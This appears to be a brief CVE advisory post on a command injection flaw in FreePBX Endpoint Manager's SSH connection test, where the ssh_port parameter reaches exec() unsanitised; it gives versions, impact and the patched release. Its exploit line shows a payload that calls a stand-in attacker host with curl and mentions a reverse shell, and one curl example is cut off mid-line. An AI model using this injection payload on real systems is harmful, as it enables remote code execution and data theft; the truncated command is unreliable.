Listen to this Post
How the CVE Works:
The vulnerability exists within the `filestore` module’s `testconnection` functionality. An authenticated administrative user can send a crafted POST request to the `check_ssh_connect()` function. This function takes user-supplied input for the SSH host (ssh_host) and port (ssh_port) parameters. While the code uses `escapeshellarg()` on the host, the port is concatenated directly into a string that is passed to the `exec()` function without proper sanitization. By injecting shell metacharacters (like `;` or &) into the `ssh_port` parameter, an attacker can append arbitrary commands to the SSH connection test string. When the `exec()` function runs, both the intended command and the injected payload are executed on the underlying operating system with the privileges of the ‘asterisk’ user, leading to remote code execution.
dailycve form:
Platform: FreePBX Endpoint Manager
Version: 17.0.2.36 – 17.0.2.x
Vulnerability: Command Injection
Severity: HIGH
date:
Prediction: Patch Released
What Undercode Say:
`curl -X POST ‘https://
`grep -n “exec.ssh_port” /path/to/testconnection.php`
How Exploit:
Authenticated attacker sends POST request with malicious `ssh_port` parameter (e.g., `22; curl http://attacker.com/$(whoami)`). Injected command executes within `exec()` call, returning output or establishing a reverse shell.
Protection from this CVE:
Upgrade to version 17.0.3.
Impact:
Remote Code Execution as asterisk user.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

